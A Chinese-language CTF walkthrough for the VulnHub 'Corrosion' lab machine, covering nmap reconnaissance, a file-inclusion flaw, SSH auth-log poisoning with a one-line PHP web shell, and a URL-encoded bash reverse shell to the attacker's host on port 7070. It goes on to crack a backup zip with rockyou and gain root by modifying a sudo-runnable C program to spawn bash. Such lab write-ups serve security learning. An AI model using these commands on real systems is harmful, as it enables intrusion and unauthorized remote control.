vulnhub-Corrosion靶机通关攻略-技术圈

作者：Kap 编辑：白帽子社区运营团队

"白帽子社区在线CTF靶场BMZCTF，欢迎各位在这里练习、学习，BMZCTF全身心为网络安全赛手提供优质学习环境，链接（http://www.bmzclub.cn/）

I. 信息收集

扫描主机

nmap -sP 192.168.189.*

端口扫描

nmap -sS -p 1-65535 -sV -v 192.168.189.129

检测到80和22端口，尝试ssh弱口令无果，访问80端口。

目录扫描

打开/blog-post/后看到以下页面

发现一个跳转和一个uploads目录，继续扫描该目录

没有发现什么东西，再回头看看刚刚那个跳转目录

打开后没有任何东西

II.漏洞利用

经过尝试，在.php后加上?file=/etc/passwd，但是/etc/shadow读取不了，猜测是权限不够。

然后发现可以读取/var/log/auth.log文件，这样的话可以尝试在ssh登陆时将一句话木马放在用户名的位置，将一句话送入用户登陆日志，再用文件包含去包含日志文件。

回到页面上，在url后加上&123=pwd

 ?file=/var/log/auth.log&123=pwd

搜索/var，看到

将pwd命令改为whoami，再看相同位置

 ?file=/var/log/auth.log&123=whoami

III.反弹shell

?file=/var/log/auth.log&123=bash%20-c%20%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.189.130%2F7070+0%3E%261%27

发现备份文件

使用curl下载到kali

curl http://192.168.189.129/blog-post/archives/randylogs.php?file=/var/backups/user_backup.zip -o user_backup.zip

下载成功后发现解压需要密码，使用rockyou字典爆破

解压

得到密码，尝试登陆靶机

登陆成功

IV.提权

查看普通用户可以使用的root命令

发现一个可以root权限执行的文件，打开对应目录，并执行

回到kali，将刚刚压缩包里的easysysinfo.c文件中的最后一个命令改为

bash -i

使用scp命令将文件传输到靶机上对应的目录中

 scp easysysinfo. c randy@192.168.189.129:/home/randy/tools/

先删掉eazysysinfo

 rm -rf easysysinfo

编译

 gcc easysysinfo.c -o easysysinfo

运行

提权成功

往期精彩文章

技术支持：白帽子社区团队

— 扫码关注我们 —